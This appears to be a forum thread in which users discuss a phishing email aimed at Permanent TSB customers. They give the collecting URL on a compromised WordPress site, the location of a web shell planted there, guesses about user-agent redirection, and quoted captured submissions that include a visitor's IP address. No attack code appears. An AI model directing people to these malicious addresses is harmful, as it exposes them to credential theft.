Permanent TSB phishing email - how does it work

podgeandrodge

Hi,

Got a new phishing email about Permanent TSB - the submit button in the HTML attachment brings you to:

www.liuzhenhui.net/wp-content/plugins/thumb/js/binisor.php

Which appears to bring me to the real Permanent TSB page.

If it's bringing you to the real page how is it gathering data?

Thanks

uck51js9zml2yt

podgeandrodge wrote: »

Hi,

Got a new phishing email about Permanent TSB - the submit button in the HTML attachment brings you to:

www.liuzhenhui.net/wp-content/plugins/thumb/js/binisor.php

Which appears to bring me to the real Permanent TSB page.

If it's bringing you to the real page how is it gathering data?

Thanks

how do you know it's the real page

podgeandrodge

Not sure what you mean by ''pavet''? If you mean how do I know it's the real website I don't. But the link brings you to what appears to be PTSB main site and links to open24 appear to be correct in the address bar ....not that I'd try logging on with correct details!

TheChizler

Was this the one about breaking their terms and conditions or something?

tricky D

Why did you even open the attachment???

(unless in a VM)

podgeandrodge

tricky D wrote: »

Why did you even open the attachment???

(unless in a VM)

Because I'm stupid and figured (stupidly on mature reflection) that the html would be safe and the only risk would be typing in my bank details.

tricky D

Naughty boy.

I must not open untrusted attachments ever except in a VM or email client which enables view source text.

Centurion wrote:

Now, write it out a hundred times. Hail Caesar! And if it's not done by sunrise, I'll cut your balls off.

Skrynesaver

I think it redirects based on user agent string, a freind got a link to it in a text to his phone last night which when followed brought up a "please supply your details so we can unlock your open24 access" page, curiously Safari had no location bar enabled...

Though trying wget with an iPhone user agent string redirects, so they may have only been open for business for a breif window

podgeandrodge

Can anyone confirm that i've got away with it and not been infected with some mad plague?!

fartyarse

podgeandrodge wrote: »

Can anyone confirm that i've got away with it and not been infected with some mad plague?!

Nope...

uck51js9zml2yt

Run an updated antivirus software and malware bytes if you have it....and then destroy your machine to make sure the virus is gone..

Here's a how to do it http://www.gizmodo.com.au/2013/07/us-government-destroys-170000-of-hardware-in-absurd-effort-to-stop-malware/

Leader of the Furlings

podgeandrodge wrote: »

Can anyone confirm that i've got away with it and not been infected with some mad plague?!

You got away with it...most likely.

No point pissing off your Anti-Virus when it's your log-in they're after.


That's not to say you didn't catch Bacterial Resistant Gonorrhea though.

900913

Some people have filled there details into it.

<snip>

There is also a shell in the thumb dir

www.liuzhenhui.net/wp-content/plugins/thumb/

0ph0rce0

900913 wrote: »

Some people have filled there details into it.

<snip>

haha

IP: 86.47.45.244
Open24 number: **** off
Name: go **** yourself
Password: ****your mother
PAN: ****yo
Mobile: ****off****of

TheChizler

0ph0rce0 wrote: »

haha

IP: 86.47.45.244
Open24 number: **** off
Name: go **** yourself
Password: ****your mother
PAN: ****yo
Mobile: ****off****of

I suppose they have gained some information from that, someone in Mullingar has a potty-keyboard.

syklops

900913 wrote: »

There is also a shell in the thumb dir

www.liuzhenhui.net/wp-content/plugins/thumb/

Zhenhui.

Sounds swedish...

snowstreams

Its moved onto pitman trucks now http://www.pitmantrucks.com.au/

So this scam will prob keep running for another while.

binisor is romanian for "pretty good" i think. So i wonder if the scam originated in Romania.